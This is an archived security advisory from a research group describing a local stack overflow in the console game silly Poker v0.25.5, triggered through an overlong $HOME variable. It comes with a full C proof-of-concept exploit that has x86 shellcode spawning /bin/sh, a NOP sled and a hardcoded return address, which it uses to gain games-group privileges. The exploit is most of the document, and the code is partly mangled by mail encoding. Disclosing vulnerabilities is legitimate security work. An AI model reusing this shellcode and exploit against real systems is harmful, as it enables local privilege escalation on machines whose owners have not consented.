TUCoPS :: Linux :: Apps N-Z :: bt1495.txt

Local stackbased overflow found for silly Poker v0.25.5 (advisory + poc exploit)

01100011 - code 'security research team'
- ----------------------------------------

- - http://www.c-code.net
- - Advisory and PoC exploit by: demz // demz@c-code.net
- - Vulnerable source: silly Poker v0.25.5
- - Bug type: Stackoverflow
- - Priority: 3

- ----------------------------------------

[01] Description
[02] Vulnerable
[03] Proof of concept
[04] Vendor response

[01] Description

     silly Poker is a simple yet comprehensive player vs. computer =
console poker game, written in C++.

     silly Poker contains an $HOME environment variable stack overflow,
     this can be exploited very simple to execute arbitrary code with =
gid=3Dgames privileges.

[02] Vulnerable

     Vulnerable and exploitable version, tested on Debian 3.1:
     -  silly Poker v0.25.5

     Maybe also prior versions are vulnerable.
     Source can be found at: =

[03] Proof of concept

     peyote:/home/demz/audit$ ./c-sillyPoker

     silly Poker v0.25.5 local exploit
     ---------------------------------------- demz @ c-code.net --

     A proof of concept exploit can be found at:

[04] Vendor response

     The vendor is informed.

Version: GnuPG v1.2.1 (GNU/Linux)


Content-Type: application/octet-stream;
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/* c-sillyPoker.c=0A=
 * PoC exploit made for advisory based uppon an local stack based =
 * Vulnerable versions, maybe also prior versions:=0A=
 * silly Poker v0.25.5=0A=
 * Tested on:  Debian 3.1=0A=
 * Advisory source: c-code.net (security research team)=0A=
 * http://www.c-code.net/Releases/Advisories/c-code-adv002.txt=0A=
 * ---------------------------------------------=0A=
 * coded by: demz (c-code.net) (demz@c-code.net)=0A=
 * ---------------------------------------------=0A=
#include <stdio.h>=0A=
#include <stdlib.h>=0A=
char shellcode[]=3D=0A=
	"\x31\xc0"                      // xor          eax, eax=0A=
        "\x31\xdb"                      // xor          ebx, ebx=0A=
        "\x31\xc9"                      // xor          ecx, ecx=0A=
        "\xb0\x46"                      // mov          al, 70=0A=
        "\xcd\x80"                      // int          0x80=0A=
        "\x31\xc0"                      // xor          eax, eax=0A=
        "\x50"                          // push         eax=0A=
        "\x68\x6e\x2f\x73\x68"          // push  long   0x68732f6e=0A=
        "\x68\x2f\x2f\x62\x69"          // push  long   0x69622f2f=0A=
        "\x89\xe3"                      // mov          ebx, esp=0A=
        "\x50"                          // push         eax=0A=
        "\x53"                          // push         ebx=0A=
        "\x89\xe1"                      // mov          ecx, esp=0A=
        "\x99"                          // cdq=0A=
        "\xb0\x0b"                      // mov          al, 11=0A=
        "\xcd\x80"                      // int          0x80=0A=
        "\x31\xc0"                      // xor          eax, eax=0A=
        "\xb0\x01"                      // mov          al, 1=0A=
        "\xcd\x80";                     // int          0x80=0A=
int main()=0A=
	unsigned long ret =3D 0xbffffb44;=0A=
	char buffer[1028];=0A=
	int i=3D0;=0A=
	memset(buffer, 0x90, sizeof(buffer));=0A=
	for (0; i < strlen(shellcode) - 1;i++)=0A=
	buffer[500 + i] =3D shellcode[i];=0A=
	buffer[1028] =3D (ret & 0x000000ff);=0A=
	buffer[1029] =3D (ret & 0x0000ff00) >> 8;=0A=
	buffer[1030] =3D (ret & 0x00ff0000) >> 16;=0A=
	buffer[1031] =3D (ret & 0xff000000) >> 24;=0A=
	buffer[1032] =3D 0x0;=0A=
	printf("\nsilly Poker v0.25.5 local exploit\n");=0A=
        printf("---------------------------------------- demz @ =
c-code.net --\n");=0A=
	setenv("HOME", buffer, 1);=0A=
	execl("/usr/bin/sillypoker", "sillypoker", NULL);=0A=

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